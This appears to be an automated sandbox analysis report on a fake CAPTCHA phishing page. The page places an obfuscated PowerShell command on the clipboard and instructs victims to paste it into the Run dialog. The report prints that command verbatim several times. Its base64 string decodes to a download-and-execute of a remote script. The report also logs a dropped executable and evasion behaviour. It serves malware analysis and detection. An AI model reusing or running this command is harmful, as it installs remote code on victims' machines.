Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: wincorlib.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.ui.xaml.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: iertutil.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: dcomp.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: wintypes.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.ui.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: inputhost.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: propsys.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: urlmon.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: srvcli.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: netutils.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: dxgi.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: d3d11.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: dxcore.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: d2d1.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: profapi.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: dwrite.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: textshaping.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: rmclient.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: uiamanager.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.ui.xaml.controls.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: msxml6.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: directmanipulation.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: windows.graphics.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: oleacc.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: mswb7.dll
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Section loaded: icu.dll
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\AtBroker.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Yara detected ReflectiveLoader

Source: Yara match	File source: 00000014.00000002.2278146446.000001F58C8DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2277861314.000001F58BFD0000.00000004.08000000.00040000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2278146446.000001F58DBEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045'

Persistence and Installation Behavior

Detect drive by download via clipboard copy & paste

Source: screenshot	OCR Text: x about:blank x Booking.cam - Partner Hub -Z vstrrrlineproperrms.world/sign-in?op_token=TfJdHmL8tgyxynNyAVQfoJA5C16hyqzkaKUihdfmGSMECOhmRPG7L51SpinTV211Jg6pqPRSZOtlubLL8VAYQb... Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Private,' - Terms Verification Steps 1. Press Windows Button C 2. Press CTRL + V 3. Press Enter 11:10 ENG p Type here to search SG W05/2025
Source: Chrome DOM: 3.5	OCR Text: Robot or human ? Check the box to confirm that you're human. Thank You! I'm not a robot reCAPTCHA Privygy - Terms Verification Steps Press Windows Button C' 1 2 Press CTRL + V 3. Press Enter
Source: screenshot	OCR Text: x about:blank x Booking.cam - Partner Hub -Z vstrrrlineproperrms.world/sign-in?op_token=TfJdHmL8tgyxynNyAVQfoJA5C16hyqzkaKUihdfmGSMECOhmRPG7L51SpinTV211Jg6pqPRSZOtlubLL8VAYQb... Robot or human ? Check the box to confirm that you're human. Thank You! c I'm not a robot reCAPTCHA Private,' - Terms Verification Steps 1. Windows Button 'C" + R 2. Press CTRL + V 3. Press Enter 11:10 ENG p Type here to search SG W05/2025

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Clipboard modification: powershell -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access -
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Clipboard modification: powershell -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access -

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe

Jump to dropped file

Source: C:\Windows\System32\AtBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Narrator.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Narrator.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3019
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6815

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 4736	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748	Thread sleep count: 3019 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748	Thread sleep count: 6815 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\Narrator.exe TID: 6500	Thread sleep time: -60000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\AtBroker.exe

Process information queried: ProcessInformation

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Windows\System32\AtBroker.exe

Process created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\AtBroker.exe

Process created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

